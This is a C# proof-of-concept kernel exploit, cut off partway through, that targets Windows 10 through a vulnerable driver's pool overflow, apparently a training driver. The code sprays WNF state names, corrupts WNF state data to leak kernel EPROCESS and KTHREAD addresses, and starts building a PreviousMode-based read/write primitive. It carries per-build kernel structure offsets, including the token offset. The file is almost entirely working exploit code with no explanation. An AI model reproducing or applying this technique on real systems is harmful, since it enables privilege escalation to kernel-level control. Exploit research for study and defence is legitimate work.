STANDARD_RIGHTS_EXECUTE = 0x00020000,
STANDARD_RIGHTS_ALL = 0x001F0000,
SPECIFIC_RIGHTS_ALL = 0x0000FFFF,
ACCESS_SYSTEM_SECURITY = 0x01000000,
MAXIMUM_ALLOWED = 0x02000000,
GENERIC_READ = 0x80000000,
GENERIC_WRITE = 0x40000000,
GENERIC_EXECUTE = 0x20000000,
GENERIC_ALL = 0x10000000,
DESKTOP_READOBJECTS = 0x00000001,
DESKTOP_CREATEWINDOW = 0x00000002,
DESKTOP_CREATEMENU = 0x00000004,
DESKTOP_HOOKCONTROL = 0x00000008,
DESKTOP_JOURNALRECORD = 0x00000010,
DESKTOP_JOURNALPLAYBACK = 0x00000020,
DESKTOP_ENUMERATE = 0x00000040,
DESKTOP_WRITEOBJECTS = 0x00000080,
DESKTOP_SWITCHDESKTOP = 0x00000100,
WINSTA_ENUMDESKTOPS = 0x00000001,
WINSTA_READATTRIBUTES = 0x00000002,
WINSTA_ACCESSCLIPBOARD = 0x00000004,
WINSTA_CREATEDESKTOP = 0x00000008,
WINSTA_WRITEATTRIBUTES = 0x00000010,
WINSTA_ACCESSGLOBALATOMS = 0x00000020,
WINSTA_EXITWINDOWS = 0x00000040,
WINSTA_ENUMERATE = 0x00000100,
WINSTA_READSCREEN = 0x00000200,
WINSTA_ALL_ACCESS = 0x0000037F
}
enum WELL_KNOWN_SID_TYPE
{
WinNullSid = 0,
WinWorldSid = 1,
WinLocalSid = 2,
WinCreatorOwnerSid = 3,
WinCreatorGroupSid = 4,
WinCreatorOwnerServerSid = 5,
WinCreatorGroupServerSid = 6,
WinNtAuthoritySid = 7,
WinDialupSid = 8,
WinNetworkSid = 9,
WinBatchSid = 10,
WinInteractiveSid = 11,
WinServiceSid = 12,
WinAnonymousSid = 13,
WinProxySid = 14,
WinEnterpriseControllersSid = 15,
WinSelfSid = 16,
WinAuthenticatedUserSid = 17,
WinRestrictedCodeSid = 18,
WinTerminalServerSid = 19,
WinRemoteLogonIdSid = 20,
WinLogonIdsSid = 21,
WinLocalSystemSid = 22,
WinLocalServiceSid = 23,
WinNetworkServiceSid = 24,
WinBuiltinDomainSid = 25,
WinBuiltinAdministratorsSid = 26,
WinBuiltinUsersSid = 27,
WinBuiltinGuestsSid = 28,
WinBuiltinPowerUsersSid = 29,
WinBuiltinAccountOperatorsSid = 30,
WinBuiltinSystemOperatorsSid = 31,
WinBuiltinPrintOperatorsSid = 32,
WinBuiltinBackupOperatorsSid = 33,
WinBuiltinReplicatorSid = 34,
WinBuiltinPreWindows2000CompatibleAccessSid = 35,
WinBuiltinRemoteDesktopUsersSid = 36,
WinBuiltinNetworkConfigurationOperatorsSid = 37,
WinAccountAdministratorSid = 38,
WinAccountGuestSid = 39,
WinAccountKrbtgtSid = 40,
WinAccountDomainAdminsSid = 41,
WinAccountDomainUsersSid = 42,
WinAccountDomainGuestsSid = 43,
WinAccountComputersSid = 44,
WinAccountControllersSid = 45,
WinAccountCertAdminsSid = 46,
WinAccountSchemaAdminsSid = 47,
WinAccountEnterpriseAdminsSid = 48,
WinAccountPolicyAdminsSid = 49,
WinAccountRasAndIasServersSid = 50,
WinNTLMAuthenticationSid = 51,
WinDigestAuthenticationSid = 52,
WinSChannelAuthenticationSid = 53,
WinThisOrganizationSid = 54,
WinOtherOrganizationSid = 55,
WinBuiltinIncomingForestTrustBuildersSid = 56,
WinBuiltinPerfMonitoringUsersSid = 57,
WinBuiltinPerfLoggingUsersSid = 58,
WinBuiltinAuthorizationAccessSid = 59,
WinBuiltinTerminalServerLicenseServersSid = 60
}
enum WNF_DATA_SCOPE
{
WnfDataScopeSystem = 0,
WnfDataScopeSession = 1,
WnfDataScopeUser = 2,
WnfDataScopeProcess = 3,
WnfDataScopeMachine = 4,
WnfDataScopePhysicalMachine = 5
}
enum WNF_STATE_NAME_LIFETIME
{
WnfWellKnownStateName = 0,
WnfPermanentStateName = 1,
WnfPersistentStateName = 2,
WnfTemporaryStateName = 3
}
/*
* P/Invoke : Struct
*/
[StructLayout(LayoutKind.Sequential)]
struct ACCESS_ALLOWED_ACE
{
public ACE_HEADER Header;
public int Mask;
public int SidStart;
}
[StructLayout(LayoutKind.Sequential)]
struct ACE_HEADER
{
public byte AceType;
public byte AceFlags;
public short AceSize;
}
[StructLayout(LayoutKind.Sequential)]
struct ACL
{
public byte AclRevision;
public byte Sbz1;
public short AclSize;
public short AceCount;
public short Sbz2;
}
[StructLayout(LayoutKind.Sequential)]
struct EX_RUNDOWN_REF
{
public IntPtr Ptr;
}
[StructLayout(LayoutKind.Sequential)]
struct LIST_ENTRY
{
public IntPtr Flink;
public IntPtr Blink;
}
[StructLayout(LayoutKind.Sequential)]
struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
struct RTL_BALANCED_NODE
{
public IntPtr Left;
public IntPtr Right;
public ulong ParentValue;
}
[StructLayout(LayoutKind.Sequential)]
struct SECURITY_DESCRIPTOR
{
public byte Revision;
public byte Sbz1;
public ushort Control; // SECURITY_DESCRIPTOR_CONTROL Enum
public IntPtr Owner; // PSID
public IntPtr Group; // PSID
public IntPtr Sacl; // PACL
public IntPtr Dacl; // PACL
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
struct STARTUPINFO
{
public int cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public int dwX;
public int dwY;
public int dwXSize;
public int dwYSize;
public int dwXCountChars;
public int dwYCountChars;
public int dwFillAttribute;
public int dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
struct WNF_NAME_INSTANCE
{
public WNF_NODE_HEADER Header;
public EX_RUNDOWN_REF RunRef;
public RTL_BALANCED_NODE TreeLinks;
public ulong StateName;
public IntPtr ScopeInstance;
public WNF_STATE_NAME_REGISTRATION StateNameInfo;
public IntPtr StateDataLock;
public IntPtr StateData;
public uint CurrentChangeStamp;
public IntPtr PermanentDataStore;
public IntPtr StateSubscriptionListLock;
public LIST_ENTRY StateSubscriptionListHead;
public LIST_ENTRY TemporaryNameListEntry;
public IntPtr CreatorProcess; // Pointer to EPROCESS
public int DataSubscribersCount;
public int CurrentDeliveryCount;
}
[StructLayout(LayoutKind.Sequential)]
struct WNF_NODE_HEADER
{
public ushort NodeTypeCode;
public ushort NodeByteSize;
}
[StructLayout(LayoutKind.Sequential)]
struct WNF_STATE_DATA
{
public WNF_NODE_HEADER Header;
public uint AllocatedSize;
public uint DataSize;
public uint ChangeStamp;
}
[StructLayout(LayoutKind.Sequential)]
struct WNF_STATE_NAME_REGISTRATION
{
public uint MaxStateSize;
public IntPtr TypeId;
public IntPtr SecurityDescriptor;
}
/*
* P/Invoke : API
*/
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool AddAccessAllowedAce(
IntPtr pAcl,
int dwAceRevision,
ACCESS_MASK AccessMask,
IntPtr pSid);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
static extern IntPtr CreateFile(
string lpFileName,
uint dwDesiredAccess,
uint dwShareMode,
IntPtr lpSecurityAttributes,
uint dwCreationDisposition,
uint dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern bool CreateProcess(
string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool CreateWellKnownSid(
WELL_KNOWN_SID_TYPE WellKnownSidType,
IntPtr DomainSid,
IntPtr pSid,
ref int cbSid);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool DeviceIoControl(
IntPtr hDevice,
uint dwIoControlCode,
IntPtr InBuffer,
int nInBufferSize,
IntPtr OutBuffer,
int nOutBufferSize,
IntPtr pBytesReturned,
IntPtr lpOverlapped);
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool InitializeAcl(
IntPtr pAcl,
int nAclLength,
int dwAclRevision);
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool InitializeSecurityDescriptor(
IntPtr pSecurityDescriptor,
int dwRevision);
[DllImport("ntdll.dll")]
static extern int NtCreateWnfStateName(
out ulong StateName,
WNF_STATE_NAME_LIFETIME NameLifetime,
WNF_DATA_SCOPE DataScope,
bool PersistData,
IntPtr TypeId,
uint MaximumStateSize,
IntPtr SecurityDescriptor);
[DllImport("ntdll.dll")]
static extern int NtDeleteWnfStateData(
in ulong StateName,
IntPtr ExplicitScope);
[DllImport("ntdll.dll")]
static extern int NtDeleteWnfStateName(in ulong StateName);
[DllImport("ntdll.dll")]
static extern int NtQueryWnfStateData(
in ulong StateName,
IntPtr TypeId,
IntPtr ExplicitScope,
out uint nChangeStamp,
IntPtr buffer,
ref uint nBufferSize);
[DllImport("ntdll.dll")]
static extern int NtReadVirtualMemory(
IntPtr ProcessHandle,
IntPtr BaseAddress,
IntPtr Buffer,
uint NumberOfBytesToRead,
IntPtr NumberOfBytesReaded);
[DllImport("ntdll.dll")]
static extern int NtUpdateWnfStateData(
in ulong StateName,
IntPtr Buffer,
uint Length,
IntPtr TypeId,
IntPtr ExplicitScope,
uint MatchingChangeScope,
uint CheckStamp);
[DllImport("ntdll.dll")]
static extern int NtWriteVirtualMemory(
IntPtr ProcessHandle,
IntPtr BaseAddress,
IntPtr Buffer,
uint NumberOfBytesToWrite,
IntPtr NumberOfBytesWritten);
[DllImport("ntdll.dll")]
static extern void RtlGetNtVersionNumbers(
ref int MajorVersion,
ref int MinorVersion,
ref int BuildNumber);
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool SetSecurityDescriptorDacl(
IntPtr pSecurityDescriptor,
bool bDaclPresent,
IntPtr pDacl,
bool bDaclDefaulted);
[DllImport("kernel32.dll", SetLastError = true)]
static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
/*
* Windows Const.
*/
const int ACL_REVISION = 2;
static readonly int STATUS_BUFFER_TOO_SMALL = Convert.ToInt32("0xC0000023", 16);
const uint GENERIC_READ = 0x80000000;
const uint GENERIC_WRITE = 0x40000000;
static readonly IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);
const uint OPEN_EXISTING = 3;
const int SECURITY_DESCRIPTOR_REVISION = 1;
const int SECURITY_MAX_SID_SIZE = 68;
const int STATUS_SUCCESS = 0;
// const ushort WNF_SCOPE_MAP_CODE = 0x901;
// const ushort WNF_SCOPE_INSTANCE_CODE = 0x902;
const ushort WNF_NAME_INSTANCE_CODE = 0x903;
// const ushort WNF_STATE_DATA_CODE = 0x904;
// const ushort WNF_SUBSCRIPTION_CODE = 0x905;
// const ushort WNF_PROCESS_CONTEXT_CODE = 0x906;
static int g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
static int g_OffsetThreadListHead = 0; // nt!_KPROCESS.ThreadListHead
static int g_OffsetThreadListEntry = 0; // nt!_KTHREAD.ThreadListEntry
static int g_OffsetPreviousMode = 0; // nt!_KTHREAD.PreviousMode
static int g_OffsetUniqueProcessId = 0; // nt!_EPROCESS.UniqueProcessId
static int g_ActiveProcessLinks = 0; // nt!_EPROCESS.ActiveProcessLinks
static int g_OffsetToken = 0; // nt!_EPROCESS.Token
/*
* Global Variable
*/
const uint g_ModifiedStateDataSize = 0x200;
static readonly ulong[] g_StateNames = new ulong[10000];
const uint IOCTL_ALLOC_OVERFLOW_BUFFER = 0xDEAD2003;
const uint IOCTL_FREE_OVERFLOW_BUFFER = 0xDEAD2007;
const uint IOCTL_TRIGGER_OVERFLOW = 0xDEAD200B;
const ulong WNF_STATE_KEY = 0x41C64E6DA3BC0074;
/*
* User defined function
*/
static ulong AllocateWnfNameInstance(IntPtr pSecurityDescriptor)
{
int ntstatus = NtCreateWnfStateName(
out ulong stateName,
WNF_STATE_NAME_LIFETIME.WnfTemporaryStateName,
WNF_DATA_SCOPE.WnfDataScopeMachine,
false,
IntPtr.Zero,
0x1000,
pSecurityDescriptor);
if (ntstatus != STATUS_SUCCESS)
{
Console.WriteLine("\n[-] Failed to NtCreateWnfStateName (ntstatus = 0x{0}).\n", ntstatus.ToString("X8"));
return 0UL;
}
return stateName;
}
static bool AllocateWnfStateData(ulong stateName, byte[] data)
{
IntPtr buffer = Marshal.AllocHGlobal(data.Length);
Marshal.Copy(data, 0, buffer, data.Length);
int ntstatus = NtUpdateWnfStateData(
in stateName,
buffer,
(uint)data.Length,
IntPtr.Zero,
IntPtr.Zero,
0,
0);
Marshal.FreeHGlobal(buffer);
return ntstatus == STATUS_SUCCESS;
}
static bool CheckTargetVersion()
{
int MajorVersion = 0;
int MinorVersion = 0;
int BuildNumber = 0;
Console.WriteLine("[>] Checking target environment.");
if (!Environment.Is64BitOperatingSystem)
{
Console.WriteLine("[-] 32bit OS is not supported.");
return false;
}
if (!Environment.Is64BitProcess)
{
Console.WriteLine("[-] This PoC should be build as 64bit binary.");
return false;
}
RtlGetNtVersionNumbers(ref MajorVersion, ref MinorVersion, ref BuildNumber);
BuildNumber &= 0xFFFF;
if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 10240)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1507 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E8; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2F0; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 10586)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1511 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E8; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2F0; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 14393)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1607 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E8; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2F0; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 15063)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1703 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E0; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2E8; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 16299)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1709 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E0; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2E8; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 17134)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1803 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E0; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2E8; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 17763)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1809 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E0; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2E8; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x358; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 18362)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1903 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E8; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2F0; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x360; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 18363)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 1909 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x2E8; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x2F0; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x360; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 19041)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 2004 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x440; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x448; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x4B8; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 19042)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 2009 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x440; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x448; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x4B8; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 19043)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 2104 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x440; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x448; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x4B8; // nt!_EPROCESS.Token
return true;
}
else if (MajorVersion == 10 && MinorVersion == 0 && BuildNumber == 19044)
{
Console.WriteLine("[+] DETECTED: Windows 10 Version 2110 x64");
g_OffsetPcb = 0; // nt!_EPROCESS.Pcb
g_OffsetThreadListHead = 0x30; // nt!_KPROCESS.ThreadListHead
g_OffsetPreviousMode = 0x232; // nt!_KTHREAD.PreviousMode
g_OffsetThreadListEntry = 0x2F8; // nt!_KTHREAD.ThreadListEntry
g_OffsetUniqueProcessId = 0x440; // nt!_EPROCESS.UniqueProcessId
g_ActiveProcessLinks = 0x448; // nt!_EPROCESS.ActiveProcessLinks
g_OffsetToken = 0x4B8; // nt!_EPROCESS.Token
return true;
}
else
{
Console.WriteLine("[-] Unsupported version is detected.");
return false;
}
}
static bool FreeWnfNameInstance(ulong stateName)
{
return NtDeleteWnfStateName(in stateName) == STATUS_SUCCESS;
}
static bool FreeWnfStateData(ulong stateName)
{
return NtDeleteWnfStateData(in stateName, IntPtr.Zero) == STATUS_SUCCESS;
}
static IntPtr GetDeviceHandle(string devicePath)
{
return CreateFile(
devicePath,
GENERIC_READ | GENERIC_WRITE,
0,
IntPtr.Zero,
OPEN_EXISTING,
0,
IntPtr.Zero);
}
static IntPtr GetWorldGenericAllSecurityDescriptor()
{
bool status;
int cbSid = SECURITY_MAX_SID_SIZE;
IntPtr pSid = IntPtr.Zero;
int cbDacl;
IntPtr pDacl = IntPtr.Zero;
IntPtr pSecurityDescriptor = IntPtr.Zero;
do
{
pSid = Marshal.AllocHGlobal(cbSid);
status = CreateWellKnownSid(
WELL_KNOWN_SID_TYPE.WinWorldSid,
IntPtr.Zero,
pSid,
ref cbSid);
if (!status)
break;
cbDacl = Marshal.SizeOf(typeof(ACL)) +
Marshal.SizeOf(typeof(ACCESS_ALLOWED_ACE)) -
Marshal.SizeOf(typeof(int)) +
cbSid;
pDacl = Marshal.AllocHGlobal(cbDacl);
status = InitializeAcl(pDacl, cbDacl, ACL_REVISION);
if (!status)
break;
status = AddAccessAllowedAce(
pDacl,
ACL_REVISION,
ACCESS_MASK.GENERIC_ALL,
pSid);
if (!status)
break;
pSecurityDescriptor = Marshal.AllocHGlobal(Marshal.SizeOf(
typeof(SECURITY_DESCRIPTOR)));
status = InitializeSecurityDescriptor(
pSecurityDescriptor,
SECURITY_DESCRIPTOR_REVISION);
if (!status)
break;
status = SetSecurityDescriptorDacl(
pSecurityDescriptor,
true,
pDacl,
false);
} while (false);
if (pSid != IntPtr.Zero)
Marshal.FreeHGlobal(pSid);
if (pDacl != IntPtr.Zero)
Marshal.FreeHGlobal(pDacl);
if (!status)
{
if (pSecurityDescriptor != IntPtr.Zero)
Marshal.FreeHGlobal(pSecurityDescriptor);
return IntPtr.Zero;
}
return pSecurityDescriptor;
}
static bool IoctlAllocateObject(IntPtr hDevice)
{
bool status;
var inputData = Encoding.ASCII.GetBytes(new string('B', 0xB0));
IntPtr buffer = Marshal.AllocHGlobal(inputData.Length);
Marshal.Copy(inputData, 0, buffer, inputData.Length);
status = DeviceIoControl(
hDevice,
IOCTL_ALLOC_OVERFLOW_BUFFER,
buffer,
inputData.Length,
IntPtr.Zero,
0,
IntPtr.Zero,
IntPtr.Zero);
Marshal.FreeHGlobal(buffer);
return status;
}
static bool IoctlFreeObject(IntPtr hDevice)
{
return DeviceIoControl(
hDevice,
IOCTL_FREE_OVERFLOW_BUFFER,
IntPtr.Zero,
0,
IntPtr.Zero,
0,
IntPtr.Zero,
IntPtr.Zero);
}
static bool IoctlOverflowObject(IntPtr hDevice, IntPtr buffer, int size)
{
return DeviceIoControl(
hDevice,
IOCTL_TRIGGER_OVERFLOW,
buffer,
size,
IntPtr.Zero,
0,
IntPtr.Zero,
IntPtr.Zero);
}
static bool IsKernelAddress(IntPtr address)
{
return (((ulong)address.ToInt64() & 0xFFFF800000000000) == 0xFFFF800000000000);
}
static bool LeakKernelData(
IntPtr hDevice,
out IntPtr pEprocess,
out ulong corruptedStateName,
out WNF_NAME_INSTANCE targetNameInstance)
{
int ntstatus;
WNF_NAME_INSTANCE nameInstance;
IntPtr pNameInstance;
int nSizeOverflow = 0xB0 + 0x10 + Marshal.SizeOf(typeof(WNF_STATE_DATA)); // (Buffer Length) + (Size of _POOL_HEADER) + (Size of _WNF_STATE_DATA)
IntPtr pOverflowInput = Marshal.AllocHGlobal(nSizeOverflow);
uint nSizeLeakData;
IntPtr pLeakData = Marshal.AllocHGlobal((int)g_ModifiedStateDataSize);
bool success = false;
var stateData = new WNF_STATE_DATA
{
Header = new WNF_NODE_HEADER { NodeTypeCode = 0x0903, NodeByteSize = 0xA8 },
AllocatedSize = g_ModifiedStateDataSize,
DataSize = g_ModifiedStateDataSize,
ChangeStamp = 1
};
Marshal.StructureToPtr(stateData, new IntPtr(pOverflowInput.ToInt64() + 0xC0), true);
pEprocess = IntPtr.Zero;
corruptedStateName = 0UL;
targetNameInstance = new WNF_NAME_INSTANCE();
for (var count = 0; count < 1000; count++)
{
IoctlAllocateObject(hDevice);
IoctlOverflowObject(hDevice, pOverflowInput, nSizeOverflow);
for (var idx = 0; idx < g_StateNames.Length; idx++)
{
if (g_StateNames[idx] == 0UL)
continue;
nSizeLeakData = 0xA0u;
ntstatus = NtQueryWnfStateData(
in g_StateNames[idx],
IntPtr.Zero,
IntPtr.Zero,
out uint nChangeStamp,
pLeakData,
ref nSizeLeakData);
if (ntstatus == STATUS_BUFFER_TOO_SMALL)
{
nSizeLeakData = g_ModifiedStateDataSize;
NtQueryWnfStateData(
in g_StateNames[idx],
IntPtr.Zero,
IntPtr.Zero,
out nChangeStamp,
pLeakData,
ref nSizeLeakData);
pNameInstance = new IntPtr(pLeakData.ToInt64() + 0xA0 + 0x10);
nameInstance = (WNF_NAME_INSTANCE)Marshal.PtrToStructure(
pNameInstance,
typeof(WNF_NAME_INSTANCE));
if (nameInstance.Header.NodeTypeCode == WNF_NAME_INSTANCE_CODE)
{
pEprocess = nameInstance.CreatorProcess;
corruptedStateName = g_StateNames[idx];
targetNameInstance = nameInstance;
break;
}
}
}
IoctlFreeObject(hDevice);
success = IsKernelAddress(pEprocess);
if (success)
break;
}
Marshal.FreeHGlobal(pLeakData);
Marshal.FreeHGlobal(pOverflowInput);
return success;
}
static IntPtr LeakKthreadAddress(
IntPtr pEprocess,
ulong corruptedStateName,
WNF_NAME_INSTANCE nameInstance)
{
IntPtr pKthread;
ulong stateNameForPrimitive = nameInstance.StateName ^ WNF_STATE_KEY;
int nOffsetNameInstance = 0xA0 + 0x10;
int nSizeBuffer = nOffsetNameInstance + Marshal.SizeOf(typeof(WNF_NAME_INSTANCE));
IntPtr inputData = Marshal.AllocHGlobal(nSizeBuffer);
IntPtr pNameInstance = new IntPtr(inputData.ToInt64() + nOffsetNameInstance);
uint nSizeMaximum = 0;
nameInstance.StateData = new IntPtr(pEprocess.ToInt64() + g_OffsetPcb + g_OffsetThreadListHead - 8);
Marshal.StructureToPtr(nameInstance, pNameInstance, false);
NtUpdateWnfStateData(
in corruptedStateName,
inputData,
(uint)nSizeBuffer,
IntPtr.Zero,
IntPtr.Zero,
0,
0);
Marshal.FreeHGlobal(inputData);
NtQueryWnfStateData(
in stateNameForPrimitive,
IntPtr.Zero,
IntPtr.Zero,
out uint nChangeStamp,
IntPtr.Zero,
ref nSizeMaximum);
pKthread = new IntPtr((((long)nChangeStamp << 32) | (long)nSizeMaximum) - g_OffsetThreadListEntry);
return pKthread;
}
static IntPtr ReadPointer(IntPtr address)
{
int ntstatus;
IntPtr result;
IntPtr buffer = Marshal.AllocHGlobal(IntPtr.Size);
ntstatus = NtReadVirtualMemory(
new IntPtr(-1),
address,
buffer,
(uint)IntPtr.Size,
IntPtr.Zero);
result = Marshal.ReadIntPtr(buffer);
Marshal.FreeHGlobal(buffer);
if (ntstatus == STATUS_SUCCESS)
return result;
else
return IntPtr.Zero;
}
static bool SetPreviousModeSwitch(
IntPtr pKthread,
ulong corruptedStateName,
WNF_NAME_INSTANCE nameInstance)
{
int ntstatus;
int nOffsetNameInstance = 0xA0 + 0x10;
int nSizeBuffer = nOffsetNameInstance + Marshal.SizeOf(typeof(WNF_NAME_INSTANCE));
